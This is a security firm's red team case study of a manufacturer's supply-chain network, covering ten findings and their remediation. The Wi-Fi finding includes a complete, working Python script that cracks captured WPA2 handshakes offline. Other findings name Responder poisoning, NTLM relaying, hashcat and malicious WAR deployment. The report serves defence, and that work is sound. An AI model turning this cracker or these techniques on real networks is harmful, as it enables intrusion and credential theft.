Red Team Assessment: Strengthening Supply Chain Security

Apr 21, 2025 | Security Assessments & Pentests

A leading consumer products company engaged us to test the security of its supply chain through a red team assessment targeting a third-party manufacturing site and that site's connectivity to the company's internal IT environment. The assessment followed a zero-knowledge (black-box) approach: the team started with no credentials, network documentation or insider information and simulated real-world attack scenarios to identify exploitable weaknesses and areas for improvement.

Scope and Objectives

The assessment focused on:

  • Identifying potential network paths between the organization’s network and the third-party manufacturing site.
  • Assessing network reachability from the third-party site to the organization’s internal infrastructure.
  • Discovering vulnerabilities in network devices and configurations that could be exploited to gain unauthorized access.

Key Findings

During the engagement the team identified the following weaknesses, several of them critical:

1. Unauthorized LAN Access

The internal network enforced no port-level access control: any device plugged into an open Ethernet port could request a DHCP lease and receive an IP address without authentication (no 802.1X or equivalent network access control was in place). This gave an attacker direct access to internal resources from which to perform reconnaissance, capture network traffic and pivot to other systems.

2. Insecure Wi-Fi Configuration

The corporate Wi-Fi relied on WPA2 pre-shared key (PSK) authentication with a passphrase weak enough to be recovered by dictionary attack. Using a rogue access point (evil twin) impersonating the corporate SSID, the team captured WPA2 four-way handshake messages from connecting clients and cracked the pre-shared key offline. The absence of rogue access point detection meant such an evil twin could operate unnoticed, exposing clients to man-in-the-middle (MITM) attacks and interception of sensitive data.
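The offline step of that attack is worth seeing in code. The block below is an added example, not tooling from the engagement: it reproduces what aircrack-ng or hashcat (mode 22000) does with a captured handshake, deriving PMK, PTK and KCK for each candidate passphrase and recomputing the MIC of EAPOL message 2 until it matches the captured one. The SSID, MAC addresses, nonces and frame are constructed for the demo; the only real-world value is the IEEE 802.11i test vector (passphrase "password", SSID "IEEE") used to check the PMK derivation.

```python
"""Offline dictionary attack against a captured WPA2-PSK four-way handshake (added example)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF: PTK = HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || data || i) for i = 0, 1, ...
    with data = min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 x 20 bytes covers the 48 bytes CCMP needs: KCK(16) | KEK(16) | TK(16)
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, whole EAPOL-Key frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (802.1X header + key descriptor); key data omitted for the demo."""
    body = (b"\x02"                                  # descriptor type: RSN
            + b"\x01\x0a"                            # key info: MIC set, pairwise, HMAC-SHA1/AES (version 2)
            + b"\x00\x10"                            # key length 16 (CCMP)
            + bytes(8)                               # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # key nonce, IV, RSC, reserved
            + mic
            + b"\x00\x00")                           # key data length 0 (RSN IE omitted here)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # version 1, type EAPOL-Key


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2, wordlist):
    """Return the passphrase whose derived KCK reproduces the MIC carried in eapol_m2, else None."""
    captured_mic = eapol_m2[81:97]  # MIC field sits at offset 81 of an EAPOL-Key frame
    zeroed = eapol_m2[:81] + bytes(16) + eapol_m2[97:]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


def demo_crack():
    """Constructed handshake (assumed SSID, MACs, nonces): a client joining with a weak passphrase."""
    ssid = "ACME-Plant-WiFi"
    ap_mac = bytes.fromhex("0011223344aa")
    sta_mac = bytes.fromhex("66778899bbcc")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # Build the "captured" message 2 exactly as a client holding the real passphrase would.
    real_kck = ptk_from_pmk(pmk_from_passphrase("password123", ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol_m2 = build_eapol_m2(snonce, eapol_mic(real_kck, build_eapol_m2(snonce)))
    wordlist = ["welcome1", "Password1", "letmein", "password123", "qwerty123"]
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo_crack())
```

The cost of the attack is the 4096-round PBKDF2 per candidate, not the handshake itself: once the attacker has message 2, the defence is entirely the passphrase's resistance to the wordlist. A long random PSK, or better WPA2/WPA3-Enterprise with certificate-based EAP, removes the offline attack.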

3. Weak Application Security

Several critical applications, including an Apache Tomcat instance, were running with default administrative credentials. Logging in to the Tomcat Manager application with well-known default credentials gave the red team full control of the server. From that foothold an attacker can deploy a malicious WAR file to execute code on the host, manipulate configurations, and escalate privileges to reach sensitive business data.

4. Exploitable Windows Protocols

The assessment revealed that Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) were enabled on multiple Windows systems. Both protocols broadcast name lookups that any host on the subnet may answer, so an attacker can respond to a mistyped or stale hostname and have the victim authenticate to a machine they control. By running Responder on the internal network, the team captured NTLMv2 challenge-responses from these authentication attempts. Captured NTLMv2 responses can be cracked offline with dictionary or brute-force attacks (hashcat mode 5600); alternatively, where SMB signing is not enforced, the poisoned authentication attempts can be relayed live to other hosts (for example with ntlmrelayx) to gain access without cracking anything.

5. Weak Password Policy

Multiple user and administrator passwords were weak and easily guessable, appearing in commonly used password lists. Our team captured authentication material from both Wi-Fi and LAN traffic (the WPA2 handshakes and NTLMv2 responses described above) and cracked it with dictionary attacks. Poor password hygiene, combined with no enforcement of a strong password policy, significantly increased the risk of credential theft and unauthorized access.

6. Insecure Active Directory Management

The organization had an excessive number of domain administrator accounts, some with weak or easily guessable passwords. Several service accounts also held privileged access and were used across many systems, so the same privileged credentials were in use on hosts throughout the network. This widespread presence of privileged credentials increased the risk of lateral movement and privilege escalation.

7. Lack of Multi-Factor Authentication (MFA)

The team compromised an Office 365 administrator account that had no multi-factor authentication (MFA) enabled, gaining access to mailboxes, confidential files and administrative tools. Without MFA, a single stolen or cracked password is enough for an attacker to maintain persistent access to critical cloud services, with little to distinguish that access from the legitimate administrator's.

8. Exposure of Building Management Systems (BMS)

The Building Management System (BMS) web interface was reachable from the Wi-Fi network and required no authentication. Anyone on the network could therefore manipulate building controls such as HVAC, lighting and physical security systems, with the potential for operational disruption at the manufacturing site.

9. Surveillance Cameras with Weak Passwords

Multiple surveillance cameras used default or weak passwords. After joining the Wi-Fi network and identifying the cameras' IP addresses, the team logged in and viewed live video feeds. Beyond the privacy impact, an attacker who can watch employee movements and guard routines in real time is well placed to plan a physical intrusion.

10. Legacy Wi-Fi Devices with Weak Authentication

A legacy Wi-Fi device that was no longer in service remained powered on and joined to the network, protected only by a weak default password. It provided an unexpected entry point into the corporate network; once inside, an attacker could run man-in-the-middle attacks, intercept sensitive communications, or use the device as a pivot for further exploitation.

Remediation and Impact

Following the assessment, we worked closely with the organization to mitigate the identified vulnerabilities. A structured remediation plan was developed and implemented, addressing each issue systematically:

  • Network security enhancements: Implemented network access control (NAC) on wired and wireless access, disabled LLMNR and NBT-NS, and enforced strong authentication for Wi-Fi and LAN access.
  • Application security hardening: Updated configurations to remove default credentials, applied access control policies, and enforced strong password policies across all critical applications.
  • Active Directory security improvements: Reduced the number of privileged accounts, implemented Privileged Identity Management (PIM), and enforced multi-factor authentication (MFA) for administrative users.
  • Infrastructure security upgrades: Restricted access to the Building Management System (BMS), secured surveillance camera configurations, and decommissioned outdated Wi-Fi devices.

These measures significantly improved the organization's security posture, reducing the risk introduced by third-party connectivity and strengthening its defenses against real-world threats. The engagement underlines the value of proactive assessments that find and fix weaknesses before an attacker exploits them.
